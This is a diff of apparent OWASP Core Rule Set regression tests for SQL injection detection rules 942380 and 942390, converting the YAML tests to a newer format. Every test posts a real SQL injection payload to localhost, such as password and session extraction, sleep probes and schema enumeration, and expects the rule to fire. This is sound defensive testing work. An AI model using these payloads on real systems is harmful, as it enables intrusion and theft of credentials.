POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-30 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-31 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute node_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-32 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute scald" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-33 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute system" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-34 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute user_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-35 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute views" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-36 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute patha" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-37 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute workb" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-38 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute panel" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-39 - desc: "SQL Injection Attack" - stages: - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=from+information_schema.tables+where+1%3D2+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-40 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-41 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-42 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-43 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-44 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-45 + - test_id: 1 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from `db_miwf`.`sys_refindex` limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 3 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 4 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ORder by" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 5 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ordeR by" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 6 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 7 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 8 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 9 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 10 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 11 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 12 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: 
"/post" + data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 13 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 14 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 'qzxjq'||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 15 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute php" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 16 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 17 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Execute(" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 18 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 19 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 20 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 21 + desc: "SQL Injection 
Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 22 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "HAVING+1%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 23 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute+elysi" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 24 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 25 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 26 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 27 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 28 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 29 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 30 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 31 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute node_" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 32 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute scald" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 33 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute system" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 34 + desc: "SQL Injection Attack" + stages: + - input: + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute user_" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 35 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute views" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 36 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute patha" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 37 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute workb" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 38 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute panel" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 39 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=from+information_schema.tables+where+1%3D2+limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 40 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 41 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 42 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 43 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 44 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 45 desc: "SQL Injection Attack: EXISTS" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" - version: HTTP/1.0 - output: - log_contains: id "942380" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml index 62e8200..05ce6b9 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml 
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml @@ -1,23 +1,21 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942390.yaml +rule_id: 942390 tests: - - test_title: 942390-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=sdfsd%27or%201%20%3e%201" - version: HTTP/1.0 - output: - log_contains: id "942390" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=sdfsd%27or%201%20%3e%201" + version: HTTP/1.0 + output: + log: + 